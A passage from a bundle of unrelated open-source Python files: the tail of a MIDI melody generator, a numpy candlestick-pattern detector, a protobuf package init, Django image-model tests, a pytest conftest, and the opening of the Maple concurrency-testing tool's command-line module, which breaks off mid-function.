self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.c4(1)
self.sc.g3(1)
# -------- ninetieth bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- ninety-first bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.e4(1)
# -------- ninety-second bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- ninety-third bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- ninety-fourth bar -------- #
# ---- major ---- #
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(1)
self.sc.modify_time(1.5, 1)
self.sc.d7(0.5)
self.sc.c7(1)
self.sc.modify_time(1, 1)
self.sc.e7(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- ninety-fifth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- ninety-sixth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- ninety-seventh bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- ninety-eighth bar -------- #
# ---- major ---- #
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(1)
self.sc.modify_time(1.5, 1)
self.sc.d7(0.5)
self.sc.c7(1)
self.sc.modify_time(1, 1)
self.sc.e7(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- ninety-ninth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- one hundredth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- one hundred-first bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- one hundred-second bar -------- #
# ---- major ---- #
self.sc.d6(8)
# -------- end -------- #
with open(self.name, 'wb') as f:
self.sc.get_midi().writeFile(f)
return self.name

# -------- Stockie/Candlestick.py (suparjotamin/stockie, MIT) -------- #
import numpy as np
np.seterr(divide='ignore', invalid='ignore')
def is_pattern(pattern, ohlc, ohlc_h1, ohlc_h2):
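    """Check three consecutive bars against a named candlestick pattern.

    `ohlc` is the current bar, `ohlc_h1` the previous bar and `ohlc_h2` the
    bar before that; each is an (open, high, low, close) sequence of scalars
    or numpy arrays. Returns a bool (or a boolean mask) for known pattern
    names, and falls through to None for unknown ones.
    """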
open = ohlc[0]
high = ohlc[1]
low = ohlc[2]
close = ohlc[3]
open_h1 = ohlc_h1[0]
high_h1 = ohlc_h1[1]
low_h1 = ohlc_h1[2]
close_h1 = ohlc_h1[3]
open_h2 = ohlc_h2[0]
high_h2 = ohlc_h2[1]
low_h2 = ohlc_h2[2]
close_h2 = ohlc_h2[3]
if pattern == 'doji':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)
else:
pass
if pattern == 'gravestone_doji':
return (abs(close - open) / (high - low) < 0.05) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) < (high - low)) & \
(high > low)
else:
pass
if pattern == 'dragonfly_doji':
return (abs(close - open) / (high - low) < 0.05) & \
(5*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)
else:
pass
if pattern == 'bullish_spinning_top':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.2) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close > open)
else:
pass
if pattern == 'bearish_spinning_top':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.2) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close < open)
else:
pass
if pattern == 'inverted_Hammer':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(10*(np.minimum(close, open) - low) < (high - low)) & \
(close > open)
else:
pass
if pattern == 'shootingstar':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(5*(high - np.maximum(close, open)) > (high - low)) & \
(10*(np.minimum(close, open) - low) < (high - low)) & \
(close < open)
else:
pass
if pattern == 'hanging_man':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(10*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close < open)
else:
pass
if pattern == 'hammer':
return (abs(close - open) / (high - low) > 0.1) & \
(abs(close - open) / (high - low) < 0.3) & \
(10*(high - np.maximum(close, open)) < (high - low)) & \
(5*(np.minimum(close, open) - low) > (high - low)) & \
(close > open)
else:
pass
if pattern == 'bullish_marubozu':
return (abs(close - open) >= 0.95*(high - low))& \
(close > open)
else:
pass
if pattern == 'bearish_marubozu':
return (abs(close - open) >= 0.95*(high - low))& \
(close < open)
else:
pass
if pattern == 'bullish_belt_hold':
return (abs(close - open) >= 0.90*(high - low))& \
(abs(open - low)*100 < (high - low) ) & \
(high > close) & \
(close > open)
else:
pass
if pattern == 'bearish_belt_hold':
return (abs(close - open) >= 0.90*(high - low))& \
(abs(open - high)*100 < (high - low)) & \
(low < close) & \
(close < open)
else:
pass
# Double
if pattern == 'bullish_engulfing':
return (open_h1 > close_h1) & \
(close > open) & \
(open_h1 < close) & \
(close_h1 > open) & \
(high_h1 < high) & \
(low_h1 > low)
else:
pass
if pattern == 'bearish_engulfing':
return (open_h1 < close_h1) & \
(close < open) & \
(open_h1 > close) & \
(close_h1 < open) & \
(high_h1 < high) & \
(low_h1 > low)
else:
pass
if pattern == 'tweezer_top':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(high_h1 - high) < (high - low))
else:
pass
if pattern == 'tweezer_bottom':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(low_h1 - low) < (high - low))
else:
pass
if pattern == 'bullish_separating_line':
return (open_h1 < open) & \
(open_h1 > close_h1) & \
(open < close)
else:
pass
if pattern == 'bearish_separating_line':
return (open_h1 > open) & \
(open_h1 < close_h1) & \
(open > close)
else:
pass
if pattern == 'piercing_line':
return (open_h1 > close_h1) & \
(open < close) & \
(close_h1 > open) & \
(open_h1 > close) & \
((open_h1 - close_h1) < 2*(close - close_h1))
else:
pass
if pattern == 'dark_cloud_cover':
return (open_h1 < close_h1) & \
(open > close) & \
(close_h1 < open) & \
(open_h1 < close) & \
((close_h1 - open_h1) < 2*(close_h1 - close))
else:
pass
if pattern == 'mathing_high':
return (open_h1 < close_h1) & \
(close > open) & \
(20*abs(high_h1 - high) < (high - low))
else:
pass
if pattern == 'mathing_low':
return (open_h1 > close_h1) & \
(close < open) & \
(20*abs(low_h1 - low) < (high - low))
else:
pass
if pattern == 'bullish_harami':
return (open_h1 > close_h1) &\
(close > open) &\
(open_h1 > close) &\
(close_h1 < open) &\
((open_h1 - close_h1) > 4*(close - open))
else:
pass
if pattern == 'bearish_harami':
return (open_h1 < close_h1) &\
(close < open) &\
(open_h1 < close) &\
(close_h1 > open) &\
((close_h1 - open_h1) > 4*(open - close))
else:
pass
if pattern == 'bullish_harami_cross':
return (open_h1 > close_h1) & \
(open_h1 > close) & \
(close_h1 < open) & \
(abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low))
else:
pass
if pattern == 'bearish_harami_cross':
return (open_h1 < close_h1) & \
(open_h1 < close) & \
(close_h1 > open) & \
(abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low))
else:
pass
if pattern == 'descending_hawk':
return (open_h1 < close_h1) & \
(close > open) & \
(open_h1 < open) & \
(close_h1 > close)
else:
pass
if pattern == 'homing_pigeon':
return (open_h1 > close_h1) & \
(close < open) & \
(open_h1 > open) & \
(close_h1 < close)
else:
pass
if pattern == 'bullish_in_neck':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(close_h1 - close) < (high - low_h1))
else:
pass
if pattern == 'bearish_in_neck':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(close_h1 - close) < (high_h1 - low))
else:
pass
if pattern == 'bullish_on_neck':
return (open_h1 < close_h1) & \
(close < open) & \
(20*abs(high_h1 - low) < (high - low_h1))
else:
pass
if pattern == 'bearish_on_neck':
return (open_h1 > close_h1) & \
(close > open) & \
(20*abs(low_h1 - high) < (high_h1 - low))
else:
pass
if pattern == 'bullish_kicking':
return (open_h1 > close_h1) & \
(open < close) & \
((open_h1 - close_h1) > 0.9*(high_h1 - low_h1)) & \
((close_h1 - open_h1) > 0.9*(high - low)) & \
(open_h1 < open)
else:
pass
if pattern == 'bearish_kicking':
return (open_h1 < close_h1) & \
(open > close) & \
((close_h1 - open_h1) > 0.9*(high_h1 - low_h1)) & \
((open - close) > 0.9*(high - low)) & \
(open_h1 > open)
else:
pass
#triple
if pattern == 'morning_star':
return (open_h2 > close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.maximum(open_h1, close_h1) < close_h2) &\
(np.maximum(open_h1, close_h1) < open) &\
(high_h1 > low_h1) &\
(close > open)
else:
pass
if pattern == 'evening_star':
return (open_h2 < close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(high_h1 > low_h1) &\
(close < open)
else:
pass
if pattern == 'morning_doji_star':
return (open_h2 > close_h2) &\
(abs(close_h1 - open_h1)/(high_h1 - low_h1) < 0.05) &\
(np.minimum(open_h1, close_h1) < close_h2) &\
(np.minimum(open_h1, close_h1) < open) &\
(close > open)
else:
pass
if pattern == 'evening_doji_star':
return (open_h2 < close_h2) &\
(abs(close_h1 - open_h1)/(high_h1 - low_h1) < 0.05) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(close < open)
else:
pass
if pattern == 'three_white_soldier':
return (open_h2 < close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 < close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open < close) &\
(2*abs(close - open) > (high - low)) &\
(0.5*(close_h2 + open_h2) < 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) < 0.5*(close + open)) &\
(close_h1 > close_h2) &\
(close > close_h1)
else:
pass
if pattern == 'three_black_crow':
return (open_h2 > close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 > close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open > close) &\
(2*abs(close - open) > (high - low)) &\
(0.5*(close_h2 + open_h2) > 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) > 0.5*(close + open)) &\
(close_h1 < close_h2) &\
(close < close_h1)
else:
pass
if pattern == 'three_inside_up':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(open_h1 < open) &\
((open + close) > (open_h1 + close_h1)) &\
(open_h2 > close_h1) &\
(close_h2 < open_h1)
else:
pass
if pattern == 'three_inside_down':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 > open) &\
((open + close) < (open_h1 + close_h1))&\
(close_h2 > open_h1) &\
(open_h2 < close_h1)
else:
pass
if pattern == 'deliberation':
return (open_h2 < close_h2) &\
(2*abs(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(open_h1 < close_h1) &\
(2*abs(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(open < close) &\
(3*abs(close - open) < abs(close_h1 - open_h1)) &\
(0.5*(close_h2 + open_h2) < 0.5*(close_h1 + open_h1)) &\
(0.5*(close_h1 + open_h1) < 0.5*(close + open)) &\
(close_h1 > close_h2) &\
(close > close_h1)
else:
pass
if pattern == 'three_outside_up':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(open_h1 < open) &\
((open + close) > (open_h1 + close_h1)) &\
(open_h2 < close_h1) &\
(close_h2 > open_h1)
else:
pass
if pattern == 'three_outside_down':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 > open) &\
((open + close) < (open_h1 + close_h1))&\
(close_h2 < open_h1) &\
(open_h2 > close_h1)
else:
pass
if pattern == 'bullish_abandoned_baby':
return (open_h2 > close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.maximum(open_h1, close_h1) < close_h2) &\
(np.maximum(open_h1, close_h1) < open) &\
(high_h1 > low_h1) &\
(high_h1 < low_h2) &\
(high_h1 < low) &\
(close > open)
else:
pass
if pattern == 'bearish_abandoned_baby':
return (open_h2 < close_h2) &\
(3*abs(close_h1 - open_h1) < abs(close_h2 - open_h2)) &\
(3*abs(close_h1 - open_h1) < abs(close - open)) &\
(np.minimum(open_h1, close_h1) > close_h2) &\
(np.minimum(open_h1, close_h1) > open) &\
(high_h1 > low_h1) &\
(low_h1 > high_h2) &\
(low_h1 > high) &\
(close < open)
else:
pass
if pattern == 'bullish_stick_sandwich':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open > close) &\
(open_h1 > close_h2) &\
(open_h2 < close_h1) &\
(open > close_h1) &\
(close < open_h1) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(open - close) > (high - low)) &\
(20*abs(close_h2 - close) < (high - np.minimum(low_h2,low)))
else:
pass
if pattern == 'bearish_stick_sandwich':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
(open_h1 < close_h2) &\
(open_h2 > close_h1) &\
(open < close_h1) &\
(close > open_h1) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(close - open) > (high - low)) &\
(20*abs(close_h2 - close) < (low - np.maximum(high_h2, high)))
else:
pass
if pattern == 'bullish_side_by_side_white_line':
return (open_h2 < close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(2*(close - open) > (high - low)) &\
(open_h1 > close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bearish_side_by_side_black_line':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(open_h1 - close_h1) > (high_h1 - low_h1)) &\
(2*(open - close) > (high - low)) &\
(open_h1 < close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bearish_side_by_side_white_line':
return (open_h2 > close_h2) &\
(open_h1 < close_h1) &\
(open < close) &\
(2*(open_h2 - close_h2) > (high_h2 - low_h2)) &\
(2*(close_h1 - open_h1) > (high_h1 - low_h1)) &\
(2*(close - open) > (high - low)) &\
(close_h1 < close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'bullish_side_by_side_black_line':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(2*(close_h2 - open_h2) > (high_h2 - low_h2)) &\
(2*(open_h1 - close_h1) > (high_h1 - low_h1)) &\
(2*(open - close) > (high - low)) &\
(close_h1 > close_h2) &\
(20*abs(close_h1 - close) < (np.maximum(high, high_h1)-np.minimum(low, low_h1))) &\
(20*abs(open_h1 - open) < (np.maximum(high, high_h1)-np.minimum(low, low_h1)))
else:
pass
if pattern == 'upside_gap_three':
return (open_h2 < close_h2) &\
(open_h1 < close_h1) &\
(open > close) &\
(close_h2 < open_h1) &\
(open > open_h1) &\
(close < close_h2)
else:
pass
if pattern == 'downside_gap_three':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
(close_h2 > open_h1) &\
(open < open_h1) &\
(close > close_h2)
else:
pass
if pattern == 'upside_gap_two_crow':
return (open_h2 < close_h2) &\
(open_h1 > close_h1) &\
(open > close) &\
(open_h1 < open) &\
(close_h1 > close) &\
(close_h2 < close)
else:
pass
if pattern == 'unique_three_river_bottom':
return (open_h2 > close_h2) &\
(open_h1 > close_h1) &\
(open < close) &\
((close_h1 - low_h1) > 2*(open_h1 - close_h1)) &\
(close < close_h1)&\
(open > low_h1)
else:
pass
if pattern == 'bullish_tri_star':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)& \
(abs(close_h1 - open_h1) / (high_h1 - low_h1) < 0.05) & \
(4*(high_h1 - np.maximum(close_h1, open_h1)) > (high_h1 - low_h1)) & \
(4*(np.minimum(close_h1, open_h1) - low_h1) > (high_h1 - low_h1)) & \
(high_h1 > low_h1)& \
(abs(close_h2 - open_h2) / (high_h2 - low_h2) < 0.05) & \
(4*(high_h2 - np.maximum(close_h2, open_h2)) > (high_h2 - low_h2)) & \
(4*(np.minimum(close_h2, open_h2) - low_h2) > (high_h2 - low_h2)) & \
(high_h2 > low_h2) & \
(close_h2 > close_h1) & \
(close > close_h1)
else:
pass
if pattern == 'bearish_tri_star':
return (abs(close - open) / (high - low) < 0.05) & \
(4*(high - np.maximum(close, open)) > (high - low)) & \
(4*(np.minimum(close, open) - low) > (high - low)) & \
(high > low)& \
(abs(close_h1 - open_h1) / (high_h1 - low_h1) < 0.05) & \
(4*(high_h1 - np.maximum(close_h1, open_h1)) > (high_h1 - low_h1)) & \
(4*(np.minimum(close_h1, open_h1) - low_h1) > (high_h1 - low_h1)) & \
(high_h1 > low_h1)& \
(abs(close_h2 - open_h2) / (high_h2 - low_h2) < 0.05) & \
(4*(high_h2 - np.maximum(close_h2, open_h2)) > (high_h2 - low_h2)) & \
(4*(np.minimum(close_h2, open_h2) - low_h2) > (high_h2 - low_h2)) & \
(high_h2 > low_h2) & \
(close_h2 < close_h1) & \
(close < close_h1)
else:
pass
if pattern == 'three_star_in_the_north':
return (close_h2 > open_h2) & \
(close_h1 > open_h1) & \
(close > open) & \
(close_h2 - open_h2 > close_h1 - open_h1) & \
(close_h1 - open_h1 > close - open) & \
(close_h2 < close_h1) & \
(close_h1 < close)
else:
pass
if pattern == 'three_star_in_the_south':
return (close_h2 < open_h2) & \
(close_h1 < open_h1) & \
(close < open) & \
(close_h2 - open_h2 < close_h1 - open_h1) & \
(close_h1 - open_h1 < close - open) & \
(close_h2 > close_h1) & \
(close_h1 > close)
else:
pass
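
# A minimal usage sketch (values are hypothetical): feed the current bar and
# the two preceding bars as (open, high, low, close) tuples. Because every
# test is written with `&` and numpy helpers, whole OHLC columns can also be
# screened at once by passing arrays instead of scalars.
if __name__ == '__main__':
    prev2 = (10.0, 12.0, 9.5, 10.1)  # two bars ago (ignored by 2-bar patterns)
    prev1 = (10.1, 10.6, 9.0, 9.2)   # previous bar: small bearish body
    curr = (9.1, 11.8, 8.9, 11.5)    # current bar engulfs the previous body
    print(is_pattern('bullish_engulfing', curr, prev1, prev2))  # True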

# -------- spice21py/spice21py/protos/__init__.py (HW21/Spice21, BSD-3-Clause) -------- #
# Paper-over these uglified module names
from .spice21_pb2 import *
from .bsim4_pb2 import *
from .mos_pb2 import *
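
# Thanks to the wildcard re-exports above, callers can import generated
# message classes from this package directly (e.g. `from .protos import X`
# for whatever names the *_pb2 modules define) without spelling out the
# uglified _pb2 module names.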

# -------- daguerre/tests/unit/test_models.py (Styria-Digital/django-daguerre, BSD-3-Clause) -------- #
from daguerre.models import AdjustedImage
from daguerre.tests.base import BaseTestCase
class AreaTestCase(BaseTestCase):
def test_delete_adjusted_images__save(self):
"""
        Saving an area should delete "related" adjusted images that use
        areas (the crop), while leaving area-independent adjustments (the
        fit) intact.
"""
storage_path = self.create_image('100x100.png')
kwargs = {
'storage_path': storage_path,
'adjusted': storage_path,
}
area = self.create_area(storage_path=storage_path)
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
**kwargs)
adjusted2 = AdjustedImage.objects.create(requested='crop|50|50',
**kwargs)
area.save()
self.assertRaises(AdjustedImage.DoesNotExist,
AdjustedImage.objects.get,
pk=adjusted2.pk)
AdjustedImage.objects.get(pk=adjusted1.pk)
def test_delete_adjusted_images__delete(self):
"""
        Deleting an area should delete "related" adjusted images that use
        areas (the crop), while leaving area-independent adjustments (the
        fit) intact.
"""
storage_path = self.create_image('100x100.png')
kwargs = {
'storage_path': storage_path,
'adjusted': storage_path,
}
area = self.create_area(storage_path=storage_path)
adjusted1 = AdjustedImage.objects.create(requested='fit|50|50',
**kwargs)
adjusted2 = AdjustedImage.objects.create(requested='crop|50|50',
**kwargs)
area.delete()
self.assertRaises(AdjustedImage.DoesNotExist,
AdjustedImage.objects.get,
pk=adjusted2.pk)
AdjustedImage.objects.get(pk=adjusted1.pk)

# -------- tests/conftest.py (uranusjr/snafu, ISC) -------- #
import unittest.mock
import sys
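
# Stub out winreg before test collection starts: winreg exists only on
# Windows, so replacing it with a Mock presumably lets Windows-specific
# modules be imported during collection on other platforms.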
def pytest_collectstart():
sys.modules['winreg'] = unittest.mock.Mock()

# -------- script/maple/idiom/main.py (SnowOnion/maple, Apache-2.0) -------- #
"""Copyright 2011 The University of Michigan
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Authors - Jie Yu (jieyu@umich.edu)
"""
import os
import sys
import subprocess
import optparse
from maple.core import config
from maple.core import logging
from maple.core import pintool
from maple.core import static_info
from maple.core import testing
from maple.pct import history as pct_history
from maple.race import pintool as race_pintool
from maple.idiom import iroot
from maple.idiom import memo
from maple.idiom import history as idiom_history
from maple.idiom import pintool as idiom_pintool
from maple.idiom import offline_tool as idiom_offline_tool
from maple.idiom import testing as idiom_testing
# global variables
_separator = '---'
def get_prefix(pin, tool=None):
c = []
c.append(pin.pin())
c.extend(pin.options())
if tool != None:
c.extend(tool.options())
c.append('--')
return c
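# get_prefix() assembles the launch prefix that wraps the program under
# test, roughly [<pin binary>, <pin options...>, <tool options...>, '--'];
# the trailing '--' separates Pin/tool options from the target's own argv.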
def separate_opt_prog(argv):
if not _separator in argv:
return argv, []
else:
opt_argv = argv[0:argv.index(_separator)]
prog_argv = argv[argv.index(_separator)+1:]
return opt_argv, prog_argv
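# For example (hypothetical argv):
#   separate_opt_prog(['--mode', 'runout', '---', './app', '-n', '2'])
#   -> (['--mode', 'runout'], ['./app', '-n', '2'])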
def __display_image_table(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
sinfo.display_image_table(output)
def __display_inst_table(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
sinfo.display_inst_table(output)
def __display_iroot_db(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
iroot_db.display(output)
def __display_memo_exposed_set(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.display_exposed_set(output)
def __display_memo_summary(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
memo_db = memo.Memo(sinfo, iroot_db)
memo_db.load(options.memo_in)
memo_db.display_summary(output)
def __display_test_history(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
test_history = idiom_history.TestHistory(sinfo, iroot_db)
test_history.load(options.test_history)
test_history.display(output)
def __display_test_history_summary(output, options):
sinfo = static_info.StaticInfo()
sinfo.load(options.sinfo_in)
iroot_db = iroot.iRootDB(sinfo)
iroot_db.load(options.iroot_in)
